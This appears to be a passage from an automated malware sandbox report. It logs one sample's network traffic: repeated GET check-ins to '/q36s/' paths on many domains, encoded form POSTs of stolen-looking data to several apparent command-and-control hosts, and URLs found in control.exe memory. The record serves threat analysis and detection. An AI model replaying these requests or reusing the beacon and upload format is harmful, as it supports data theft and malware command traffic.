Source: global traffic	HTTP traffic detected: GET /q36s/?1bGpqN=YsZgiMyir4QObMcXj4/OoGvu8CzjTsx3cWH2zl5uagrD8+tBN1FIEP+EOGgFqY0IHdLq&wFNT8=0jNDXxTXR8rtijfp HTTP/1.1Host: www.cosmosmeta.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /q36s/?1bGpqN=Ci79+kEJw4TCq7yLtV3k9oXgcXWe+c7BxrEK17mwieGIptEQJza+v2Dc8Iz1jOVSWisc&Vr=MBZl9ZMXj4u HTTP/1.1Host: www.yokoi-tatami-lab.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /q36s/?1bGpqN=FgZmHunv013Q9EOx8OzeBGKV8sIXYwnIYQMpCCMzOG6h6X8t3t+l8o1J2BnYMBVPpIZA&Vr=MBZl9ZMXj4u HTTP/1.1Host: www.okargo.proConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /q36s/?1bGpqN=Taj2aUXsQP+C4UcdcHZBeTyAvKtskpO/tWyZABwI4RRX1GdPLoNftssJ9pruDd6VDLGR&Vr=MBZl9ZMXj4u HTTP/1.1Host: www.gestaltants.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /q36s/?1bGpqN=3pP/L2XpSC30J9vFVSLRbULXiIxRhzb0AzWKRXEle5xB/rg0XzMhonS5eIq4WPaEzNk7&Vr=MBZl9ZMXj4u HTTP/1.1Host: www.marketplaceimmo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /q36s/?1bGpqN=KaI0Rj3wcsIqg8Lge9r70qxIl2ZARFR6pw9QZ8eIk4lgB884W2uHm2Neex91t0JOAHKn&wFNT8=0jNDXxTXR8rtijfp HTTP/1.1Host: www.fraiuhs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /q36s/?1bGpqN=QZvQCpprdvdahDmS7NmKrSAADUyIV3QwKizJm0tHu4ylzR2u4nzvWcUcdlEm3O78XaNr&Vr=MBZl9ZMXj4u HTTP/1.1Host: www.flat-planet.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /q36s/?1bGpqN=VigMRdHlcuoP+Sw3yuFwqC380HsjzcbE0b4n2u2ieXC1OCRINUCS2txvQYXeentP/kMQ&wFNT8=0jNDXxTXR8rtijfp HTTP/1.1Host: www.perfectselfstorageaston.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /q36s/?1bGpqN=u2o/mXnBhWEQf/pveWhGu62rKF+mK4qUp4dBBRZihtSbDfqqopE5TB84A5tdbEb+PdMV&wFNT8=0jNDXxTXR8rtijfp HTTP/1.1Host: www.computershit.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: global traffic	HTTP traffic detected: POST /q36s/ HTTP/1.1Host: www.flat-planet.comConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.flat-planet.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.flat-planet.com/q36s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 31 62 47 70 71 4e 3d 66 62 62 71 63 4f 5a 6d 55 4f 42 49 30 30 54 45 76 5a 6e 79 30 32 34 46 56 6c 43 64 58 58 55 4b 5a 31 72 4d 34 31 78 71 68 4d 53 59 7e 6a 57 44 38 45 76 39 64 6f 59 62 4b 30 41 51 37 5f 72 4b 59 35 34 30 46 48 46 4f 54 78 68 79 35 61 78 30 28 41 37 56 6c 38 51 5a 55 69 4f 65 46 6a 45 4b 61 48 57 62 7a 61 36 33 7e 5f 63 73 33 4c 4e 6a 5a 57 50 50 5a 6f 59 38 57 58 36 51 77 61 54 52 4d 38 43 71 4a 78 61 47 64 4c 78 39 33 67 59 49 76 50 7a 30 71 56 30 64 53 6a 66 58 48 4a 34 48 63 76 47 62 53 52 70 71 7a 6d 5a 31 7e 49 4e 5f 76 6a 6b 50 36 54 66 48 71 33 48 70 67 51 64 36 34 6f 6d 33 71 43 6d 56 4e 5f 72 37 66 39 33 42 46 65 4e 59 36 4f 53 48 72 42 7e 59 41 6b 35 5f 34 43 62 2d 62 70 77 72 33 48 4c 68 59 69 4a 59 5a 6d 48 66 65 55 4f 2d 48 58 6f 65 37 44 65 36 34 38 45 6e 43 76 5a 6f 46 47 62 47 72 45 63 68 56 44 64 4a 79 6d 74 4f 62 54 42 6c 32 33 36 55 6f 56 69 32 38 41 57 75 69 4b 54 33 69 6e 46 51 79 51 4f 67 44 32 67 68 48 72 55 34 46 68 44 42 69 61 4b 62 57 70 63 6b 41 44 76 5f 6c 61 46 4b 55 31 52 70 53 5a 61 7a 63 67 67 36 28 5f 56 4c 54 57 4d 69 6f 4f 4f 41 47 5a 62 44 76 4d 4f 4c 4c 6f 78 38 4f 38 58 4a 35 65 59 55 45 4e 6f 52 56 54 58 78 71 49 74 33 62 57 36 35 30 77 67 70 6c 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 1bGpqN=fbbqcOZmUOBI00TEvZny024FVlCdXXUKZ1rM41xqhMSY~jWD8Ev9doYbK0AQ7_rKY540FHFOTxhy5ax0(A7Vl8QZUiOeFjEKaHWbza63~_cs3LNjZWPPZoY8WX6QwaTRM8CqJxaGdLx93gYIvPz0qV0dSjfXHJ4HcvGbSRpqzmZ1~IN_vjkP6TfHq3HpgQd64om3qCmVN_r7f93BFeNY6OSHrB~YAk5_4Cb-bpwr3HLhYiJYZmHfeUO-HXoe7De648EnCvZoFGbGrEchVDdJymtObTBl236UoVi28AWuiKT3inFQyQOgD2ghHrU4FhDBiaKbWpckADv_laFKU1RpSZazcgg6(_VLTWMioOOAGZbDvMOLLox8O8XJ5eYUENoRVTXxqIt3bW650wgplg).
Source: global traffic	HTTP traffic detected: POST /q36s/ HTTP/1.1Host: www.flat-planet.comConnection: closeContent-Length: 36480Cache-Control: no-cacheOrigin: http://www.flat-planet.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.flat-planet.com/q36s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 31 62 47 70 71 4e 3d 66 62 62 71 63 50 6c 4b 51 39 46 56 78 6b 58 76 68 4b 58 6d 37 6e 49 44 54 45 32 43 53 54 45 56 4f 55 36 33 31 55 41 61 67 49 36 43 35 51 79 71 32 6e 65 36 64 6f 70 5f 41 6e 6b 55 6f 76 6e 4e 59 35 52 2d 46 48 52 4f 53 77 35 69 35 39 56 53 7e 69 44 57 69 63 51 31 56 69 4f 39 4f 43 6f 6e 61 48 54 32 7a 61 79 6e 7e 76 49 73 74 70 46 6a 62 56 6e 36 58 6f 59 2d 62 33 71 4d 74 4b 57 7a 4d 34 6d 79 4a 77 6d 47 64 36 4e 39 32 44 77 48 74 4f 7a 33 6a 6c 31 32 58 6a 66 38 4d 70 6b 54 63 76 4b 35 53 54 39 71 7a 55 4e 31 28 59 74 5f 70 55 49 4d 79 44 66 47 75 33 48 6b 71 77 68 52 34 73 47 42 71 44 53 5f 59 62 28 37 65 4e 33 41 42 4a 70 32 73 4e 36 75 6e 6b 71 46 41 6b 45 62 35 54 32 74 62 70 63 4c 77 77 7a 77 47 55 63 50 5a 6b 4b 77 66 30 50 31 49 33 70 41 37 44 65 4b 34 38 46 47 43 75 70 6f 46 46 72 47 35 52 59 68 52 6e 70 4b 73 57 74 50 56 7a 42 39 79 33 6e 6e 6f 56 61 41 38 42 79 45 69 38 7a 33 67 43 35 51 69 52 4f 76 4c 57 67 37 4e 4c 56 73 50 42 44 4f 69 61 4c 4f 57 6f 63 30 41 79 7a 5f 6c 4a 64 4b 5a 33 70 70 56 35 61 7a 51 41 67 38 71 50 51 54 54 56 38 6d 6f 50 7e 32 47 4f 44 44 76 66 47 4c 4b 4e 64 38 4a 4d 58 4a 67 4f 5a 36 49 4e 4e 61 51 52 58 47 76 4b 6c 53 53 6a 37 70 33 44 5a 6b 6d 43 75 69 4b 2d 38 4e 43 56 7e 6f 46 7a 63 2d 56 49 6c 4f 66 7a 50 44 74 4d 35 6c 66 70 30 4b 48 2d 64 33 50 75 66 6a 30 42 46 44 54 54 36 4e 56 48 31 44 53 50 4a 54 46 67 74 5a 4b 56 6c 63 43 53 38 39 7a 6f 6e 39 58 72 65 6d 71 66 61 70 67 34 38 61 63 4f 39 36 50 56 53 6b 66 43 6a 45 6f 57 4e 34 64 72 77 71 66 51 6a 76 68 69 54 37 71 5a 4a 4e 37 61 77 68 52 51 57 51 4f 5f 44 50 30 67 48 7a 69 57 36 65 41 55 43 61 72 6a 30 6c 56 4d 71 5f 7e 4f 69 62 73 4f 43 51 67 72 53 58 79 44 65 4a 67 6b 66 56 4d 77 74 45 33 38 6a 64 33 79 4f 69 58 74 5a 52 42 79 61 75 38 53 62 76 31 36 69 38 74 37 47 6a 68 42 70 76 79 48 4e 4a 45 30 56 67 61 36 30 51 51 52 51 31 33 35 37 30 6e 50 42 37 64 66 6b 77 53 33 6a 6f 32 32 47 66 76 5a 50 56 66 67 70 6f 62 45 30 45 28 6b 63 58 4f 74 75 6d 39 42 30 50 39 6b 7e 4e 71 70 66 66 6e 61 41 44 45 4b 46 5a 4c 59 52 30 6a 68 6d 51 74 4b 47 78 6d 33 31 46 6c 75 46 38 78 4c 54 53 28 36 37 67 36 4f 51 35 4a 7a 49 6e 7e 48 37 71 4c 6b 4b 49 39 6f 30 49 57 70 72 39 34 73 75 65 7e 34 51 49 68 72 55 4d 54 6e 7a 74 61 48 31 67 39 4d 28 4a 70 47 6c 4a 47 75 45 48 35 33 28 56 72 33 39 5f 32 4c 73 54 71 50 50 43 72 63 61 4a 50 74 4b 41 50 2d 28 52 66 79 4c 32 46 45 48 42 4f 53 32 6f 34 74 6f 33 6e 73 4f 6e 35 76 64 37 6d 53 78 6a 48 77 31 7a 59 6b 66 4a 48 37 41 66 53 31 50 61 65 47 37 46 4d 79 64 66 71 39 49 69 50 7a 79 52 5a 47 4a 66
Source: global traffic	HTTP traffic detected: POST /q36s/ HTTP/1.1Host: www.perfectselfstorageaston.comConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.perfectselfstorageaston.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.perfectselfstorageaston.com/q36s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 31 62 47 70 71 4e 3d 61 67 55 32 50 36 71 55 59 2d 45 49 75 6a 70 6a 6d 4b 49 35 7e 32 37 71 33 6c 6f 74 6d 5f 7a 4f 6e 39 68 59 69 4d 57 65 57 45 4f 6f 50 41 55 53 4c 55 71 4c 6c 70 51 76 54 4b 6e 34 66 6c 55 6b 35 57 38 56 4d 32 62 4f 33 62 46 44 48 6c 49 52 4a 43 70 77 33 50 64 69 58 4b 77 4b 44 70 63 62 77 5f 68 37 77 56 50 7a 6e 4e 78 38 53 64 7e 6c 70 38 75 33 45 35 42 32 73 56 36 57 79 72 7e 68 50 35 32 7a 34 73 69 68 56 52 33 47 76 55 6d 72 6e 32 30 6c 4d 61 57 52 66 79 64 66 6e 7a 4e 4d 73 61 7a 6e 61 76 57 46 58 64 44 66 41 6e 6e 45 5a 69 61 30 56 56 58 68 32 4e 39 4e 6d 5f 31 38 46 43 4a 7a 28 6c 37 65 50 57 41 45 62 46 4b 4a 78 43 4b 6d 79 4a 47 6d 73 6c 69 57 44 4d 6c 63 4e 34 72 53 47 70 42 55 28 31 47 68 63 48 6b 56 5a 77 35 6f 62 73 42 37 6f 32 4f 5a 72 37 49 70 77 56 67 4a 79 45 4a 6d 32 4a 34 78 52 74 33 4e 63 51 70 6c 76 59 36 62 34 49 37 30 58 39 78 36 73 4a 48 4c 6f 44 73 41 6f 59 32 67 53 49 79 74 6d 52 4c 43 30 55 52 79 46 6e 31 6a 59 32 4e 43 79 6f 69 39 45 45 4b 30 71 36 77 74 69 6f 4f 64 75 4a 42 68 7a 2d 6c 78 34 46 37 76 63 6a 5a 4b 6a 51 52 49 68 55 33 6b 55 69 61 6f 54 5a 6f 34 61 39 47 48 7a 31 72 77 7e 69 4d 46 4d 73 62 73 4e 6f 47 58 63 46 32 7a 47 54 35 39 28 72 4d 4b 28 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 1bGpqN=agU2P6qUY-EIujpjmKI5~27q3lotm_zOn9hYiMWeWEOoPAUSLUqLlpQvTKn4flUk5W8VM2bO3bFDHlIRJCpw3PdiXKwKDpcbw_h7wVPznNx8Sd~lp8u3E5B2sV6Wyr~hP52z4sihVR3GvUmrn20lMaWRfydfnzNMsaznavWFXdDfAnnEZia0VVXh2N9Nm_18FCJz(l7ePWAEbFKJxCKmyJGmsliWDMlcN4rSGpBU(1GhcHkVZw5obsB7o2OZr7IpwVgJyEJm2J4xRt3NcQplvY6b4I70X9x6sJHLoDsAoY2gSIytmRLC0URyFn1jY2NCyoi9EEK0q6wtioOduJBhz-lx4F7vcjZKjQRIhU3kUiaoTZo4a9GHz1rw~iMFMsbsNoGXcF2zGT59(rMK(Q).
Source: global traffic	HTTP traffic detected: POST /q36s/ HTTP/1.1Host: www.perfectselfstorageaston.comConnection: closeContent-Length: 36480Cache-Control: no-cacheOrigin: http://www.perfectselfstorageaston.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.perfectselfstorageaston.com/q36s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 31 62 47 70 71 4e 3d 61 67 55 32 50 34 28 42 56 75 6f 72 6b 54 31 41 72 5a 35 75 71 32 6e 6f 79 56 73 79 36 4f 66 42 77 38 77 68 6d 4a 36 6e 58 46 6d 2d 63 41 35 79 64 6b 44 65 6c 6f 4d 57 4c 4a 44 38 61 46 6f 6c 35 57 6c 30 4d 32 66 4f 32 66 77 59 47 45 5a 45 49 6d 4a 33 33 76 64 53 57 4b 78 4d 48 6f 51 6d 77 5f 56 53 77 56 32 6f 6e 38 64 38 41 72 79 6c 76 37 36 2d 4c 35 42 77 74 56 71 4b 32 71 44 4e 50 34 54 6d 34 70 43 68 56 42 37 47 75 33 75 6b 6c 33 30 6d 4c 4b 57 55 54 53 63 50 38 6a 49 31 73 62 48 4a 61 71 75 46 57 76 58 66 41 32 4c 45 59 56 75 33 42 56 58 65 79 4e 39 36 69 5f 34 6c 46 43 6b 68 28 67 62 6f 50 44 77 45 61 31 4b 79 30 56 58 5a 6b 49 48 77 71 6c 7e 68 44 4d 5a 68 4f 71 50 61 47 72 45 42 37 48 65 53 54 44 63 5f 5a 32 6f 44 59 4d 41 77 76 47 50 62 72 37 49 5a 77 56 68 6f 79 45 35 6d 32 4f 4d 78 52 50 50 4e 56 52 70 6b 6a 59 36 65 74 59 36 79 5a 64 39 4b 73 49 6a 62 6f 44 55 71 6f 4c 61 67 64 4a 43 74 76 45 71 55 28 30 52 6f 50 48 31 71 53 57 4e 48 79 6f 69 50 45 47 69 6b 70 4c 73 74 6a 39 36 64 76 76 64 68 79 4f 6c 78 6d 31 37 70 56 44 55 50 6a 51 4a 4d 68 55 47 5a 56 54 65 6f 53 50 38 34 5a 59 71 48 7e 6c 72 77 6d 53 4d 53 47 4e 4b 79 47 72 53 36 66 58 43 77 49 56 6f 6c 32 66 42 5f 71 4d 50 61 34 55 49 4f 34 38 6a 55 78 34 34 4b 6d 46 35 63 30 33 57 43 6c 76 49 32 4d 35 35 31 77 53 32 72 6f 41 54 6c 44 45 43 5a 4c 53 77 61 57 44 41 33 4f 74 72 55 4b 57 67 2d 51 7a 4a 4d 71 48 34 45 37 50 62 49 42 32 59 63 35 7a 7a 5f 39 54 5a 4e 74 41 47 65 54 4a 52 72 50 56 58 55 46 4a 37 47 6d 2d 33 39 69 6d 32 69 7e 50 38 45 71 41 63 75 76 32 77 64 53 74 77 55 33 62 67 45 61 48 77 31 72 45 33 43 59 63 45 2d 68 7a 55 36 50 74 32 77 31 45 6b 62 75 78 37 6c 35 7a 79 68 43 4b 45 75 6f 75 74 37 59 53 4c 56 39 4b 38 7a 7a 55 7e 74 75 71 78 68 45 47 46 45 62 42 70 6b 32 41 7e 56 47 42 67 50 78 77 7a 6f 42 73 4a 4f 4c 67 62 30 74 32 42 48 43 4c 41 57 67 57 44 69 49 61 42 57 50 55 36 6e 7a 58 78 47 36 44 6a 61 54 4f 34 63 28 74 46 6a 4b 75 47 4f 55 5a 6b 7a 44 6e 48 64 69 63 66 64 59 4e 77 54 7a 49 45 6c 74 4f 4c 5a 44 42 77 37 44 47 66 6e 78 39 67 34 52 4b 4c 4a 46 59 66 6d 36 4c 42 66 30 39 76 39 4e 70 77 76 37 6c 4d 55 71 67 6d 44 58 39 6d 74 28 31 37 43 46 75 59 4f 55 68 36 73 57 39 61 35 72 51 57 36 50 54 4d 57 33 78 4d 49 30 71 42 39 73 2d 41 6b 78 66 4f 43 61 52 34 78 39 6d 77 47 6b 41 75 7a 65 73 30 38 52 68 52 66 62 67 73 36 4f 41 4c 68 77 41 42 67 59 4d 57 56 45 43 6b 51 75 50 58 43 48 76 49 4e 31 5a 44 70 43 58 55 67 4b 47 70 6a 76 6c 46 71 48 41 6b 62 4e 79 30 4f 28 77 6c 54 76 47 70 6b 58 6f 76 37
Source: global traffic	HTTP traffic detected: POST /q36s/ HTTP/1.1Host: www.computershit.netConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.computershit.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.computershit.net/q36s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 31 62 47 70 71 4e 3d 68 30 63 46 34 33 54 72 6e 42 52 6c 4a 73 59 56 4a 41 6b 6c 7a 38 4f 49 64 47 61 53 41 70 4b 69 37 63 4d 68 48 51 70 59 74 65 43 37 4e 2d 4b 74 35 4c 68 41 55 57 4e 66 62 4c 64 32 48 58 6a 47 45 39 70 67 56 6d 6d 48 35 4e 55 55 72 47 6c 36 56 31 75 38 45 59 6f 48 4c 4a 64 59 73 47 4a 4a 39 49 66 31 6d 68 67 61 79 2d 50 52 7e 64 7a 5a 48 62 38 6f 4f 30 39 48 33 43 69 46 5a 65 75 43 79 75 38 65 78 72 6e 53 42 63 28 52 34 4c 37 74 31 35 42 71 6b 61 62 42 61 6d 6e 5a 67 34 4d 32 66 6d 30 55 30 76 68 4a 71 44 67 4d 55 53 37 74 61 61 73 6a 32 45 42 6a 6a 61 37 52 51 66 4a 72 6e 38 74 32 35 30 51 65 76 6f 39 38 77 61 54 43 70 71 34 75 4f 6d 28 44 79 67 38 56 48 5a 74 76 78 43 7a 63 74 37 65 46 7a 45 4e 72 41 39 4d 43 45 48 46 65 75 6e 53 73 38 4e 66 58 6f 53 72 78 63 39 34 55 55 63 45 45 57 76 69 5f 49 32 63 64 45 51 4d 78 74 31 69 46 4b 75 78 50 4b 34 43 45 42 48 67 53 68 44 74 30 74 6c 4b 32 7e 4b 50 72 54 67 70 4b 4d 7a 32 5f 33 31 53 37 6b 50 57 7a 7a 2d 57 54 71 36 4c 69 28 43 79 6a 51 69 68 67 7a 50 73 65 5a 4a 78 58 33 74 45 72 74 42 75 5a 78 45 56 46 70 65 56 5a 77 38 6f 68 7a 77 35 79 48 31 4c 65 75 49 70 6a 56 67 4a 70 65 51 36 4f 77 59 49 72 6b 47 74 5f 49 63 6e 32 69 36 6f 5a 41 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 1bGpqN=h0cF43TrnBRlJsYVJAklz8OIdGaSApKi7cMhHQpYteC7N-Kt5LhAUWNfbLd2HXjGE9pgVmmH5NUUrGl6V1u8EYoHLJdYsGJJ9If1mhgay-PR~dzZHb8oO09H3CiFZeuCyu8exrnSBc(R4L7t15BqkabBamnZg4M2fm0U0vhJqDgMUS7taasj2EBjja7RQfJrn8t250Qevo98waTCpq4uOm(Dyg8VHZtvxCzct7eFzENrA9MCEHFeunSs8NfXoSrxc94UUcEEWvi_I2cdEQMxt1iFKuxPK4CEBHgShDt0tlK2~KPrTgpKMz2_31S7kPWzz-WTq6Li(CyjQihgzPseZJxX3tErtBuZxEVFpeVZw8ohzw5yH1LeuIpjVgJpeQ6OwYIrkGt_Icn2i6oZAA).
Source: global traffic	HTTP traffic detected: POST /q36s/ HTTP/1.1Host: www.computershit.netConnection: closeContent-Length: 36480Cache-Control: no-cacheOrigin: http://www.computershit.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.computershit.net/q36s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 31 62 47 70 71 4e 3d 68 30 63 46 34 79 36 79 71 56 6f 6c 48 63 55 6d 4f 32 6f 78 34 76 47 4b 4e 6d 65 42 50 49 57 39 28 6f 42 47 61 42 5a 68 73 66 36 6c 4a 4f 57 41 6f 63 31 59 55 58 39 32 44 49 35 79 57 6e 66 46 45 2d 5a 43 56 6d 71 48 34 4e 73 2d 72 6c 4e 45 56 57 4b 6a 4a 59 6f 5f 5a 4a 64 37 6e 6e 46 6f 39 49 62 44 6d 68 6f 4b 79 4e 72 52 73 76 37 5a 50 34 6b 5a 57 30 39 42 72 79 79 6a 64 65 53 54 79 75 55 47 78 72 4c 53 42 73 44 52 36 72 72 71 69 6f 42 70 74 71 62 45 66 6d 6e 36 75 59 4a 52 66 6d 78 48 30 71 42 4a 71 78 55 4d 53 54 62 74 4e 62 73 6b 35 55 42 69 6e 61 37 6d 42 50 45 33 6e 38 5a 78 35 77 49 52 76 61 68 38 7a 4b 54 44 75 35 49 6d 43 52 69 42 30 68 49 45 48 5a 68 47 77 58 50 45 74 5f 57 6c 6c 48 56 2d 63 50 56 5a 45 45 70 6b 73 48 53 6f 30 74 65 54 6f 53 71 47 63 39 34 36 55 59 41 45 57 70 47 5f 4a 51 51 64 51 69 30 77 7a 46 69 41 45 4f 77 4a 4f 34 4f 34 42 48 34 34 68 47 5a 65 74 57 6d 32 28 76 7a 72 44 42 70 46 5a 6a 32 39 34 56 53 70 76 76 57 38 7a 2d 57 78 71 37 4c 79 38 7a 75 6a 52 7a 68 67 30 70 59 65 59 35 78 58 37 4e 45 31 6a 68 79 4a 78 45 64 42 70 66 6b 73 7a 4b 49 68 7a 47 6c 79 47 51 33 65 74 34 70 6a 61 41 49 57 62 53 6e 62 39 50 77 44 30 47 74 6c 42 4b 36 6b 6a 72 4e 65 45 53 72 4f 47 62 68 78 37 46 35 55 4b 51 4e 6e 75 72 7a 78 43 68 36 2d 47 49 49 4b 35 4a 33 68 6a 52 63 64 66 75 7a 4f 4b 35 47 39 71 31 6e 6c 65 4f 59 65 52 42 76 45 67 6b 49 58 59 58 34 2d 5a 75 38 4a 4d 59 69 6b 5a 4e 50 69 4b 49 43 2d 32 4e 43 43 39 75 4e 6e 57 57 33 37 41 75 6d 6e 48 6f 65 41 51 69 36 52 76 59 5a 31 70 5a 65 77 33 49 48 79 58 78 28 72 34 68 75 64 36 46 48 58 64 71 73 6b 53 45 5a 41 53 66 78 4b 33 6c 30 54 50 34 6a 62 54 6b 77 67 46 38 6b 6a 56 4d 41 54 43 6e 61 51 4d 58 4f 69 42 38 66 65 4e 48 62 52 35 47 7a 56 48 75 53 35 32 7a 64 32 55 45 41 45 42 4f 6e 45 42 49 62 76 4f 4e 48 53 74 38 69 77 47 4b 38 4a 32 55 58 6c 48 50 46 57 54 76 33 74 55 4a 70 45 55 6c 62 5a 74 73 70 52 31 45 72 6c 68 37 72 49 48 2d 34 47 4d 64 4d 67 44 35 6b 57 59 62 6e 32 7e 56 4a 57 48 52 7e 57 65 37 53 5f 28 6f 4b 49 51 73 66 6b 46 36 70 67 30 38 61 49 49 6b 68 6a 49 50 71 41 45 51 71 42 30 4a 43 72 44 51 6e 4a 77 67 77 50 47 41 32 48 30 6f 4c 67 54 48 66 54 72 33 67 77 6e 65 69 4b 46 41 58 72 68 6c 79 4d 4c 72 65 73 4d 32 32 50 37 46 66 4b 42 34 78 38 46 4b 7e 44 45 4d 74 6f 7a 72 65 32 46 46 64 4a 38 39 78 31 55 57 32 73 38 68 57 43 69 62 46 72 6e 30 32 36 4b 77 76 4f 7e 66 4b 61 52 31 44 6e 57 78 79 74 48 2d 59 66 47 59 45 36 4a 4e 74 59 58 66 35 4c 4e 67 48 62 63 45 33 4a 6b 7a 31 76 35 35 73 34 42 37 61 34 45 4e 62 43 72 44 6b 50 6e 53 69

Source: control.exe, 0000000B.00000002.822337905.0000000005B6B000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://www.perfectselfstorageaston.com
Source: control.exe, 0000000B.00000002.822337905.0000000005B6B000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://www.perfectselfstorageaston.com/q36s/
Source: control.exe, 0000000B.00000002.821918860.00000000054F2000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://www.searchvity.com/
Source: control.exe, 0000000B.00000002.821918860.00000000054F2000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://www.searchvity.com/?dn=

Source: unknown

DNS traffic detected: queries for: www.strickercosolutions.com

Source: global traffic	HTTP traffic detected: GET /q36s/?1bGpqN=qjehMM29YnjvQ+IsXXvHiKjxodx29m58RRND8kRaJ9rSQmiI4bNYuG3T9nEMHR/0ZqgQ&wFNT8=0jNDXxTXR8rtijfp HTTP/1.1Host: www.fhpuyfpe.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /q36s/?1bGpqN=tC61wDElLuFqXOy7bNjE3R/KY1KZZj+Oe9iJyNVpeVf3JMOvufdGkYhMQuQyKkTwQ1EL&wFNT8=0jNDXxTXR8rtijfp HTTP/1.1Host: www.unitedtrials.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /q36s/?1bGpqN=IHzjIaKw9hHBssJHvR7q+BIW1etDJxSUidZLadnwIl9v5RmtoBh2/TNAfU7VUcX2DTn2&wFNT8=0jNDXxTXR8rtijfp HTTP/1.1Host: www.oooci.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /q36s/?1bGpqN=VigMRdHlcuoP+Sw3yuFwqC380HsjzcbE0b4n2u2ieXC1OCRINUCS2txvQYXeentP/kMQ&wFNT8=0jNDXxTXR8rtijfp HTTP/1.1Host: www.perfectselfstorageaston.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /q36s/?1bGpqN=u2o/mXnBhWEQf/pveWhGu62rKF+mK4qUp4dBBRZihtSbDfqqopE5TB84A5tdbEb+PdMV&wFNT8=0jNDXxTXR8rtijfp HTTP/1.1Host: www.computershit.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /q36s/?1bGpqN=+82WZbOcHchnV2OkjKF3NixdkboeLFcgXndQeltEW38JzDdOoRl+u1EVmT0W3Jonz/Y6&wFNT8=0jNDXxTXR8rtijfp HTTP/1.1Host: www.getbraintruth.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /q36s/?1bGpqN=YsZgiMyir4QObMcXj4/OoGvu8CzjTsx3cWH2zl5uagrD8+tBN1FIEP+EOGgFqY0IHdLq&wFNT8=0jNDXxTXR8rtijfp HTTP/1.1Host: www.cosmosmeta.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /q36s/?1bGpqN=Ci79+kEJw4TCq7yLtV3k9oXgcXWe+c7BxrEK17mwieGIptEQJza+v2Dc8Iz1jOVSWisc&Vr=MBZl9ZMXj4u HTTP/1.1Host: www.yokoi-tatami-lab.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /q36s/?1bGpqN=FgZmHunv013Q9EOx8OzeBGKV8sIXYwnIYQMpCCMzOG6h6X8t3t+l8o1J2BnYMBVPpIZA&Vr=MBZl9ZMXj4u HTTP/1.1Host: www.okargo.proConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /q36s/?1bGpqN=Taj2aUXsQP+C4UcdcHZBeTyAvKtskpO/tWyZABwI4RRX1GdPLoNftssJ9pruDd6VDLGR&Vr=MBZl9ZMXj4u HTTP/1.1Host: www.gestaltants.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /q36s/?1bGpqN=3pP/L2XpSC30J9vFVSLRbULXiIxRhzb0AzWKRXEle5xB/rg0XzMhonS5eIq4WPaEzNk7&Vr=MBZl9ZMXj4u HTTP/1.1Host: www.marketplaceimmo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
